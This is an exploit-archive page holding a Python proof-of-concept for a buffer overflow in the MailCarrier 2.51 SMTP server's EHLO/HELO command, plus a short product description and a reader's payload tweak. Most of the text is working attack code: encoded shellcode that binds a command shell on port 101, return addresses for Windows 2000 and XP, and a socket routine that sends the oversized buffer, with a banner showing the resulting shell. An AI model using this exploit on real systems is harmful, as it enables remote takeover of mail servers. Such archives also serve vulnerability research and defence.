mailcarrier.txt

mailcarrier.txt: Posted Oct 27, 2004; Authored by muts; MailCarrier 2.51 SMTP EHLO / HELO buffer overflow exploit written in python that spawns a shell on port 101 of the target machine.; tags | exploit, overflow, shell, python; SHA-256 | 9cdcfa966f1b52e3db88669267c30a79a0da90da60a10ee65048a42219f21e53; Download | Favorite | View

mailcarrier.txt



ABOUT :

 MailCarrier is a full-featured mail server with the latest security and anti-spam functions. It supports SSL communication and SMTP/POP3 authentication methods based on SASL and NTLM that do not transmit message and/or password in clear text. Many spam mails can be blocked through inquiry of sender's address, inquiry of RBL, filtering of message content, and so on.
MailCarrier provides you with various methods for running multiple domains. It can execute a mail server instance per domain in a single computer; you can run lots of mail servers without interference each other. In addition, you can make many virtual domains and alias domains per mail server instance as you want. For each domain and instance, you can build individual spam policy and security policy.

http://www.tabslab.com/en/product/mailcarrier20/


THE POC :

#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow   #
# Advanced, secure and easy to use FTP Server.         #
# 23 Oct 2004 - muts                                  #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py                         #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101              #
# localhost [127.0.0.1] 101 (hostname) open            #
# Microsoft Windows 2000 [Version 5.00.2195]        #
# (C) Copyright 1985-2000 Microsoft Corp.            #
# C:\WINNT\system32>                          #
#########################################################

import struct
import socket

print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n" 
print "\n\n###############################################"

def make_overflow_dummy(overflow_len, retaddr):
    return 'A' * overflow_len + struct.pack('<L', retaddr)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"

# Change RET address as need be.

#buffer = make_overflow_dummy(5093, 0x7c2ee21b) + '\x90' * 32 + sc2  # RET Win2000 SP4 ENG
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2  #RET WinXP SP2 ENG

try:
  print "\nSending evil buffer..."
  s.connect(('127.0.0.1',25))
  s.send('EHLO ' + buffer + '\r\n')
  data = s.recv(1024)
  s.close()
  print "\nDone! Try connecting to port 101 on victim machine."
except:
  print "Could not connect to SMTP!"


INFOS :

 It works as is, but you might want to change the part after the EIP to NOPs in the following way...just for esthetics sake:

buffer = make_overflow_dummy(5097, 0x7d17dd13) + 'x90' * 32 + sc2 #RET WinXP SP2 ENG



Regards to muts & the whitehat's folks
Jerome ATHIAS

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

mailcarrier.txt

mailcarrier.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mailcarrier.txt

Share This

mailcarrier.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems